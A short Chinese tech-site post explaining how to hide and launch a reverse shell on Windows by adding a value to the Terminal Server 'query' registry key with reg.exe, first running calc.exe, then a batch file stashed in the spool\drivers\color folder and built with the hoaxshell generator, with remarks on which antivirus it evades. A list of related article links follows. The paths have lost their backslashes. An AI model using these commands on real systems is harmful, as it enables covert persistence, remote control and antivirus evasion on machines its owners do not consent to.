用一条命令来隐藏反向Shell
电子说
描述
From:https://www.youtube.com/watch?v=gzv3d7rvjKA
注册表路径:
HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery
包含了与终端服务器相关的设置和配置信息。
执行命令query可以查看服务器的一些状态,实际上是执行此项值中的可执行文件。
添加一条,打开计算器。
reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01hereseccalc.exe
这里再介绍一个能够绕过一些AV的Windows反向shell生成器和交互程序。(测试环境用的X绒,可以绕过,经测试不能绕过Windows Defender的AMSI)。
https://github.com/t3l3machus/hoaxshell
将命令写入一个bat脚本中,然后添加注册表后执行。
reg.exe add "HKLMSYSTEMCurrentControlSetControlTerminal ServerUtilitiesquery" /v heresec /t REG_MULTI_SZ /d 01heresecC:WindowsSystem32spooldriverscolor1.bat query heresec
只需执行命令query heresec即可运行反弹shell脚本。
还能怎么用,再联想一下。
-
shell脚本本身自带的命令详解2023-05-23 1080
-
shell脚本基本命令2023-11-08 2210
-
Linux Shell系列教程之Shell简介和类型2018-08-28 0
-
linux shell命令/unix shell命令教程2008-12-06 730
-
Shell内建命令:exit命令2021-02-02 4029
-
Shell命令编程实践指南2022-08-19 1237
-
Shell命令行解释器简介2022-08-19 3256
-
Linux实现简易的Shell命令行解释器2023-03-30 1834
-
Kiuwan:如何防止反向Shell攻击2023-07-09 956
-
基于Go语言的反弹Shell命令生成工具简介2023-08-25 808
-
shell命令和linux命令一样吗2023-11-08 2937
-
linux命令和shell编程有什么联系2023-11-08 955
-
linux命令行与shell编程实战2023-11-08 807
-
python shell怎么用2023-11-29 1203
-
shell具有的功能和特点2024-08-30 630
全部0条评论
快来发表一下你的评论吧 !
